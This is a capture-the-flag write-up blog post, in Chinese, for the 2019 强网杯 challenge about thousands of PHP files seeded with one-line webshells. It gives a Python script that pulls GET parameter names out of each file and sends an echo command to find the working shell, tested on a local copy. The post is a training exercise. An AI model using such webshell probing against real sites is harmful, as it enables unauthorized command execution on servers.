[强网杯 2019]高明的黑客

这篇博客分享了解决网站被黑问题的过程,通过Python脚本自动化寻找PHP文件中的一句话木马。作者从简单脚本开始,逐步学习并实现了多线程版本的检测脚本,最终成功定位到可利用的文件和参数,展示了良好的脚本编写能力和问题解决思路。

目录

解题过程

1. 一个简单的exp

2. python 多线程简单实例

3. 一个低配版的exp

4. 高配版

参考链接:


考点:本题目考查的是编写脚本的能力,从中学到了许多。

解题过程

打开题目后,是这样的,显示网站被黑,但是说明了源码的位置

访问/www.tar.gz ,发现这个源码有近40MB!!!  没办法,下载吧。

下载之后,发现里面有3002个项目,只有一个是index.html,其余都是php文件。并且每个php文件都有若干个一句话木马,这个不可能一个一个试,只能通过脚本来寻找。

我的学习过程是循序渐进的,通过学习师傅们的wp,从简单脚本写起。

1. 一个简单的exp

实现获取目标目录下php文件的get参数,并且尝试执行命令。(因为是练习,我只将目标php文件和一些其他php文件放进文件夹测试,不是全部的)

import re
import os
import requests


files = os.listdir('D:/phpstudy_pro/WWW/test1/')    #获取路径下的所有文件
reg = re.compile(r'(?<=_GET\[\').*(?=\'\])')   #设置正则
for i in files:                #从第一个文件开始
    url = "http://127.0.0.1/test1/" + i
    f = open("D:/phpstudy_pro/WWW/test1/"+i)        #打开这个文件
    data = f.read()           #读取文件内容
    f.close()                 #关闭文件
    result = reg.findall(data)  #从文件中找到GET请求
    for j in result:           #从第一个GET参数开始
        payload = url + "?" + j + "=echo ******"   ##尝试请求次路径,并执行命令
        #print(payload)
        html = requests.get(payload)
        if "******" in html.text:
            print(payload)
            exit(1)

代码执行结果:

评论 11
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值